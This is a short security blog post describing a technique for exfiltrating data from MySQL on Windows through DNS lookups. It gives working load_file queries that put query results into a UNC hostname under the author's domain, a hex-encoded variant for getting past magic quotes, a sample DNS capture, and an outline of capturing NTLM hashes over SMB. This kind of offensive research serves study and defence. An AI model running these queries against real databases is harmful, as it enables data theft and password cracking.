Exfiltrating data over DNS is nowadays a very popular technique. This technique has been well documented for MS-SQL and Oracle databases. I figured out that it is also possible to do the same under Mysql Windows installation.
select load_file(concat(‘\\\\foo.’,(select ‘test’),’.notsosecure.com\\’,’a.txt’));
This query will do a dns lookup for foo.test.notsosecure.com. You need FILE privileges to call load_file function. It is quite common to find mysql running as ‘root’ user under windows installation(in connection string).
You can also use the hex encoding to bypass the magic quote restriction:
mysql> select load_file(concat(0x5c5c5c5c732e,(select concat((select mid(version
This resulted in the following DNS query:
05:20:36.349860 IP xxx.xxx.xxx.xxx.53298 > yyy.yyy.yyy.yyy.53: 17495 A? s.5.1.30-commu.test.notsosecure.com. (53)
The mysql version is 5.1.30-community
Now, mysql under windows runs as system(by default). If it was to run under any user account(e.g. administrator or a domian admin), then you can make it connect to your SMB server, send a pre calculated challenge(SMB challenge-response) and from the response obtained from the mysql server, you can then crack the NTLM session hash and thus obtain that user’s password.
I made a video demonstration of how to do it under ms-sql using xp_dirtree stored procedure, which i will post soon.